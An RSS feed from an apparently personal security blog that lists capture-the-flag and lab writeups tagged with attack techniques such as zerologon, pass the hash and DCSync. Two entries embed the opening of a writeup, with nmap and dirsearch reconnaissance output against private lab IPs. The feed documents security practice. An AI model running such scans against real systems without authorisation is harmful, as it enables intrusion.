<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>Posts on HYH&#39;s Blog</title>
    <link>https://www.hyhforever.top/posts/</link>
    <description>Recent content in Posts on HYH&#39;s Blog</description>
    <image>
      <title>HYH&#39;s Blog</title>
      <url>https://www.hyhforever.top/background.jpg</url>
      <link>https://www.hyhforever.top/background.jpg</link>
    </image>
    <generator>Hugo</generator>
    <language>zh</language>
    <lastBuildDate>Wed, 04 Feb 2026 00:00:00 +0000</lastBuildDate>
    <atom:link href="https://www.hyhforever.top/posts/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>HTB-Facts</title>
      <link>https://www.hyhforever.top/posts/2026/02/htb-facts/</link>
      <pubDate>Wed, 04 Feb 2026 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2026/02/htb-facts/</guid>
      <description>the writeup of facts in hackthebox</description>
    </item>
    <item>
      <title>HTB-Expressway</title>
      <link>https://www.hyhforever.top/posts/2025/09/htb-expressway/</link>
      <pubDate>Sun, 28 Sep 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/09/htb-expressway/</guid>
      <description>the writeup of expressway in hackthebox</description>
    </item>
    <item>
      <title>HTB-HackNeT</title>
      <link>https://www.hyhforever.top/posts/2025/09/htb-hacknet/</link>
      <pubDate>Tue, 16 Sep 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/09/htb-hacknet/</guid>
      <description>the writeup of hacknet in hackthebox</description>
    </item>
    <item>
      <title>HTB-Soulmate</title>
      <link>https://www.hyhforever.top/posts/2025/09/htb-soulmate/</link>
      <pubDate>Wed, 10 Sep 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/09/htb-soulmate/</guid>
      <description>the writeup of soulmate  in hackthebox, linux , CrashFTP, Erlang</description>
    </item>
    <item>
      <title>HackMyVM-Silentdev</title>
      <link>https://www.hyhforever.top/posts/2025/09/hackmyvm-silentdev/</link>
      <pubDate>Fri, 05 Sep 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/09/hackmyvm-silentdev/</guid>
      <description>the writeup of silentdev in Hackmyvm</description>
    </item>
    <item>
      <title>vulntarget-a</title>
      <link>https://www.hyhforever.top/posts/2025/09/vulntarget-a/</link>
      <pubDate>Thu, 04 Sep 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/09/vulntarget-a/</guid>
      <description>the writeup of vulntarget-a</description>
    </item>
    <item>
      <title>vulntarget-c</title>
      <link>https://www.hyhforever.top/posts/2025/09/vulntarget-c/</link>
      <pubDate>Wed, 03 Sep 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/09/vulntarget-c/</guid>
      <description>the writeup of vulntarget-c , Laravel, PDB, Fscan, MobaXterm</description>
    </item>
    <item>
      <title>HTB-Guardian</title>
      <link>https://www.hyhforever.top/posts/2025/09/htb-guardian/</link>
      <pubDate>Tue, 02 Sep 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/09/htb-guardian/</guid>
      <description>the writeup of guardian in hackthebox</description>
    </item>
    <item>
      <title>Thehackerslabs-Folclore</title>
      <link>https://www.hyhforever.top/posts/2025/09/thehackerslabs-folclore/</link>
      <pubDate>Tue, 02 Sep 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/09/thehackerslabs-folclore/</guid>
      <description>the writeup of Folclore in thehackerslabs</description>
    </item>
    <item>
      <title>Matrix-Breakout-2-Morpheus (New)</title>
      <link>https://www.hyhforever.top/posts/2025/08/vulnhub-matrix-breakout-2-morpheus/</link>
      <pubDate>Sat, 30 Aug 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/08/vulnhub-matrix-breakout-2-morpheus/</guid>
      <description>the writeup of Matrix-Breakout-2-Morpheus in Vulnhub</description>
    </item>
    <item>
      <title>Thehackerslabs-Patata Mágica</title>
      <link>https://www.hyhforever.top/posts/2025/08/thehackerslabs-patata-m%C3%A1gica/</link>
      <pubDate>Sat, 30 Aug 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/08/thehackerslabs-patata-m%C3%A1gica/</guid>
      <description>the writeup of Patata Mágica in thehackerslabs</description>
    </item>
    <item>
      <title>HTB-Previous</title>
      <link>https://www.hyhforever.top/posts/2025/08/htb-previous/</link>
      <pubDate>Thu, 28 Aug 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/08/htb-previous/</guid>
      <description>the writeup of previous in hackthebox</description>
    </item>
    <item>
      <title>Thehackerslabs-Welcome To The Jungle</title>
      <link>https://www.hyhforever.top/posts/2025/08/thehackerslabs-welcome-to-the-jungle/</link>
      <pubDate>Sat, 23 Aug 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/08/thehackerslabs-welcome-to-the-jungle/</guid>
      <description>the writeup of Welcome To The Jungle in thehackerslabs</description>
    </item>
    <item>
      <title>Thehackerslabs-Evelator</title>
      <link>https://www.hyhforever.top/posts/2025/08/thehackerslabs-elevator/</link>
      <pubDate>Fri, 22 Aug 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/08/thehackerslabs-elevator/</guid>
      <description>the writeup of Evelator in Thehackerslabs, Active Directory.</description>
    </item>
    <item>
      <title>HTB-CodeTwo</title>
      <link>https://www.hyhforever.top/posts/2025/08/htb-codetwo/</link>
      <pubDate>Thu, 21 Aug 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/08/htb-codetwo/</guid>
      <description>the writeup of codetwo in hackthebox</description>
    </item>
    <item>
      <title>Thehackerslabs-Pa Que Aiga Lujo</title>
      <link>https://www.hyhforever.top/posts/2025/08/thehackerslabs-pa-que-aiga-lujo/</link>
      <pubDate>Thu, 21 Aug 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/08/thehackerslabs-pa-que-aiga-lujo/</guid>
      <description>the writeup of Pa Que Aiga Lujo in thehackerslabs.</description>
    </item>
    <item>
      <title>HackMyVM-Lazzycorp</title>
      <link>https://www.hyhforever.top/posts/2025/08/hackmyvm-lazzycorp/</link>
      <pubDate>Tue, 19 Aug 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/08/hackmyvm-lazzycorp/</guid>
      <description>the writeup of lazzycorp in hackmyvm.</description>
    </item>
    <item>
      <title>HTB-Editor</title>
      <link>https://www.hyhforever.top/posts/2025/08/htb-editor/</link>
      <pubDate>Sat, 09 Aug 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/08/htb-editor/</guid>
      <description>the writeup of editor in hackthebox</description>
    </item>
    <item>
      <title>HTB-Era</title>
      <link>https://www.hyhforever.top/posts/2025/08/htb-era/</link>
      <pubDate>Tue, 05 Aug 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/08/htb-era/</guid>
      <description>the writeup of Era in hackthebox</description>
    </item>
    <item>
      <title>HackMyVM-Takedown</title>
      <link>https://www.hyhforever.top/posts/2025/07/hackmyvm-takedown/</link>
      <pubDate>Thu, 31 Jul 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/07/hackmyvm-takedown/</guid>
      <description>the writeup of Takedown in hackmyvm, SSTI, RSA</description>
    </item>
    <item>
      <title>Cyberstrikelab-SweetCake</title>
      <link>https://www.hyhforever.top/posts/2025/07/cyberstrikelab-sweetcake/</link>
      <pubDate>Mon, 28 Jul 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/07/cyberstrikelab-sweetcake/</guid>
      <description>the writeup of Sweetcake in cyberstrikelab, Struts2, 积木报表, 通达OA, Xshell, MS17-010</description>
    </item>
    <item>
      <title>Cyberstrikelab-TengSnake</title>
      <link>https://www.hyhforever.top/posts/2025/07/cyberstrikelab-tengsnake/</link>
      <pubDate>Sun, 27 Jul 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/07/cyberstrikelab-tengsnake/</guid>
      <description>the writeup of Tengsnake in cyberstrikelab, EmpireCMS,PHPCMS,DuomiCMS,Mysql,zerologon,IPC, pass the hash</description>
    </item>
    <item>
      <title>Cyberstrikelab-Thunder</title>
      <link>https://www.hyhforever.top/posts/2025/07/cyberstrikelab-thunder/</link>
      <pubDate>Wed, 23 Jul 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/07/cyberstrikelab-thunder/</guid>
      <description>the writeup of Thunder in cyberstrikelab, thinkphp rce,Mysql UDF Bypasss, Z-Blog, XXE</description>
    </item>
    <item>
      <title>Cyberstrikelab-Lab9</title>
      <link>https://www.hyhforever.top/posts/2025/07/cyberstrikelab-lab9/</link>
      <pubDate>Tue, 22 Jul 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/07/cyberstrikelab-lab9/</guid>
      <description>the writeup of lab9 in cyberstrikelab, CMSeasy, SMB, ADCS</description>
    </item>
    <item>
      <title>Cyberstrikelab-Lab7</title>
      <link>https://www.hyhforever.top/posts/2025/07/cyberstrikelab-lab7/</link>
      <pubDate>Mon, 21 Jul 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/07/cyberstrikelab-lab7/</guid>
      <description>the writeup of lab7 in cyberstrikelab, bagecms ,ms17-010, pass the hash</description>
    </item>
    <item>
      <title>Cyberstrikelab-Lab8</title>
      <link>https://www.hyhforever.top/posts/2025/07/cyberstrikelab-lab8/</link>
      <pubDate>Mon, 21 Jul 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/07/cyberstrikelab-lab8/</guid>
      <description>the writeup of lab8 in cyberstrikelab, ZZZCMS,RDP, evasion, 非约束委派</description>
    </item>
    <item>
      <title>Cyberstrikelab-Lab5</title>
      <link>https://www.hyhforever.top/posts/2025/07/cyberstrikelab-lab5/</link>
      <pubDate>Sun, 20 Jul 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/07/cyberstrikelab-lab5/</guid>
      <description>the writeup of lab5 in cyberstrikelab, BEEES CMS,zerologon,pass the hash,jboss, zerologon</description>
    </item>
    <item>
      <title>Cyberstrikelab-Lab6</title>
      <link>https://www.hyhforever.top/posts/2025/07/cyberstrikelab-lab6/</link>
      <pubDate>Sun, 20 Jul 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/07/cyberstrikelab-lab6/</guid>
      <description>the writeup of lab6 in cyberstrikelab, joomla ,ms17-010, weblogic</description>
    </item>
    <item>
      <title>Cyberstrikelab-Lab4</title>
      <link>https://www.hyhforever.top/posts/2025/07/cyberstrikelab-lab4/</link>
      <pubDate>Sat, 19 Jul 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/07/cyberstrikelab-lab4/</guid>
      <description>the writeup of lab4 in cyberstrikelab, Bluecms,zerologon,pass the hash</description>
    </item>
    <item>
      <title>Cyberstrikelab-Lab3</title>
      <link>https://www.hyhforever.top/posts/2025/07/cyberstrikelab-lab3/</link>
      <pubDate>Fri, 18 Jul 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/07/cyberstrikelab-lab3/</guid>
      <description>the writeup of lab3 in cyberstrikelab,taocms,backdoor php, cve-2020-1472, dcsync</description>
    </item>
    <item>
      <title>Cyberstrikelab-Lab1</title>
      <link>https://www.hyhforever.top/posts/2025/07/cyberstrikelab-lab1/</link>
      <pubDate>Thu, 17 Jul 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/07/cyberstrikelab-lab1/</guid>
      <description>the writeup of lab1 in cyberstrikelab, thinkphp rce,ms17-010, pass the hash</description>
    </item>
    <item>
      <title>Cyberstrikelab-Lab2</title>
      <link>https://www.hyhforever.top/posts/2025/07/cyberstrikelab-lab2/</link>
      <pubDate>Thu, 17 Jul 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/07/cyberstrikelab-lab2/</guid>
      <description>the writeup of lab2 in cyberstrikelab, 74cms getshell,ms17-010</description>
    </item>
    <item>
      <title>HTB-Outbound</title>
      <link>https://www.hyhforever.top/posts/2025/07/htb-outbound/</link>
      <pubDate>Mon, 14 Jul 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/07/htb-outbound/</guid>
      <description>the writeup of outbound in hackthebox, nuclei ,CVE-2025-49113, 3DES,CVE-2025-27591, below.</description>
    </item>
    <item>
      <title>HTB-Voleur</title>
      <link>https://www.hyhforever.top/posts/2025/07/htb-voleur/</link>
      <pubDate>Thu, 10 Jul 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/07/htb-voleur/</guid>
      <description>writeup of voleur in hackthebox, targetedkerberoast, restore user , dpapi , secretsdump, ssh</description>
    </item>
    <item>
      <title>HTB-RustyKey</title>
      <link>https://www.hyhforever.top/posts/2025/06/htb-rustykey/</link>
      <pubDate>Tue, 01 Jul 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/06/htb-rustykey/</guid>
      <description>writeup of rustykey in hackthebox, kerberos, timeroasting, COM hijack, DCsync, RunasCs</description>
    </item>
    <item>
      <title>Dockerlabs-Status</title>
      <link>https://www.hyhforever.top/posts/2025/06/dockerlabs-status/</link>
      <pubDate>Thu, 26 Jun 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/06/dockerlabs-status/</guid>
      <description>writeup of status in Dockerlabs.es, unzip, ssrf, php filter chains, include</description>
    </item>
    <item>
      <title>Dockerlabs-Bola</title>
      <link>https://www.hyhforever.top/posts/2025/06/dockerlabs-bola/</link>
      <pubDate>Tue, 24 Jun 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/06/dockerlabs-bola/</guid>
      <description>writeup of Bola in Dockerlabs.es, unzip , hydra</description>
    </item>
    <item>
      <title>HTB-Artificial</title>
      <link>https://www.hyhforever.top/posts/2025/06/htb-artificial/</link>
      <pubDate>Mon, 23 Jun 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/06/htb-artificial/</guid>
      <description>writeup of Artificial in hackthebox, TensorFlow RCE, restic</description>
    </item>
    <item>
      <title>HackMyVM-Sabulaji</title>
      <link>https://www.hyhforever.top/posts/2025/06/hackmyvm-sabulaji/</link>
      <pubDate>Fri, 13 Jun 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/06/hackmyvm-sabulaji/</guid>
      <description>writeup of sabulaji in hackmyvm.eu</description>
    </item>
    <item>
      <title>HTB-TombWatcher</title>
      <link>https://www.hyhforever.top/posts/2025/06/htb-tombwatcher/</link>
      <pubDate>Fri, 13 Jun 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/06/htb-tombwatcher/</guid>
      <description>writeup of tombwatcher in hackthebox. ESC15, Active Directory.</description>
    </item>
    <item>
      <title>HTB-Certificate</title>
      <link>https://www.hyhforever.top/posts/2025/06/htb-certificate/</link>
      <pubDate>Sun, 08 Jun 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/06/htb-certificate/</guid>
      <description>writeup of certificate in hackthebox</description>
    </item>
    <item>
      <title>Dockerlabs-ApacheByte</title>
      <link>https://www.hyhforever.top/posts/2025/06/dockerlabs-apachebyte/</link>
      <pubDate>Fri, 06 Jun 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/06/dockerlabs-apachebyte/</guid>
      <description>writeup of ApacheByte in Dockerlabs.es</description>
    </item>
    <item>
      <title>Thehackerslabs-Merchan</title>
      <link>https://www.hyhforever.top/posts/2025/06/thehackerslabs-merchan/</link>
      <pubDate>Thu, 05 Jun 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/06/thehackerslabs-merchan/</guid>
      <description>writeup of Merchan in Thehackerslabs</description>
    </item>
    <item>
      <title>Dockerlabs-Ofuskeit</title>
      <link>https://www.hyhforever.top/posts/2025/06/dockerlabs-ofuskeit/</link>
      <pubDate>Wed, 04 Jun 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/06/dockerlabs-ofuskeit/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Difficulty&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Linux&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;root@kali&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; /home/kali/ofuskeit  
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;❯ nmap 172.17.0.2 -sV -A -p-   
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;PORT     STATE SERVICE VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u6 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;protocol 2.0&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; ssh-hostkey: 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;   &lt;span class=&#34;m&#34;&gt;256&lt;/span&gt; f4:1e:4f:80:e4:25:19:87:a5:2b:e5:fe:b3:16:5d:70 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;ECDSA&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_  &lt;span class=&#34;m&#34;&gt;256&lt;/span&gt; 7d:5a:d8:80:54:05:d2:2f:6f:7f:59:26:4f:6f:83:a8 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;ED25519&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;80/tcp   open  http    Apache httpd 2.4.62 &lt;span class=&#34;o&#34;&gt;((&lt;/span&gt;Debian&lt;span class=&#34;o&#34;&gt;))&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_http-server-header: Apache/2.4.62 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Debian&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_http-title: Servicios de Mantenimiento Inform&lt;span class=&#34;se&#34;&gt;\x&lt;/span&gt;C3&lt;span class=&#34;se&#34;&gt;\x&lt;/span&gt;A1tico
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;3000/tcp open  http    Node.js Express framework
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_http-title: Error
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id=&#34;dirsearch&#34;&gt;Dirsearch&lt;/h2&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;root@kali&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; /home/kali/ofuskeit  
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;❯ dirsearch -u http://172.17.0.2      
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;  _&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;. _ _  _  _  _ _&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_    v0.4.3                                                                                                                
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt; &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;_&lt;span class=&#34;o&#34;&gt;||&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; _&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;/_&lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;_&lt;span class=&#34;o&#34;&gt;||&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;_&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;                                                                                                                         
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;                                                                                                                                                
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Extensions: php, asp, aspx, jsp, html, htm &lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; HTTP method: GET &lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; Threads: &lt;span class=&#34;m&#34;&gt;25&lt;/span&gt; &lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; Wordlist size: &lt;span class=&#34;m&#34;&gt;12289&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Target: http://172.17.0.2/
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;22:47:24&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Scanning:                                                                                                                            
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;22:47:24&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;200&lt;/span&gt; -   318B - /.git                                             
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;22:47:31&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;200&lt;/span&gt; -    2KB - /index.html                                       
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;22:47:31&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;301&lt;/span&gt; -   313B - /javascript  -&amp;gt;  http://172.17.0.2/javascript/    
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;22:47:33&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;301&lt;/span&gt; -   315B - /node_modules  -&amp;gt;  http://172.17.0.2/node_modules/
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;22:47:33&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;200&lt;/span&gt; -   14KB - /node_modules/                                    
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;22:47:33&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;200&lt;/span&gt; -   26KB - /package-lock.json                                
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;22:47:33&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;200&lt;/span&gt; -   265B - /package.json
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;22:47:34&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;403&lt;/span&gt; -   275B - /server-status                                    
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;22:47:34&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;403&lt;/span&gt; -   275B - /server-status/                                   
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;                                                                             
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Task Completed                                  
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;查看&lt;code&gt;.git&lt;/code&gt;目录，得到一个用户的信息&lt;/p&gt;</description>
    </item>
    <item>
      <title>HackMyVM-Umz</title>
      <link>https://www.hyhforever.top/posts/2025/06/hackmyvm-umz/</link>
      <pubDate>Wed, 04 Jun 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/06/hackmyvm-umz/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Difficulty&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Linux&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;root@kali&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; /home/kali/Umz  
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;❯ nmap 192.168.55.73 -sV -A -p-                                                                                                            
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;PORT   STATE SERVICE VERSION
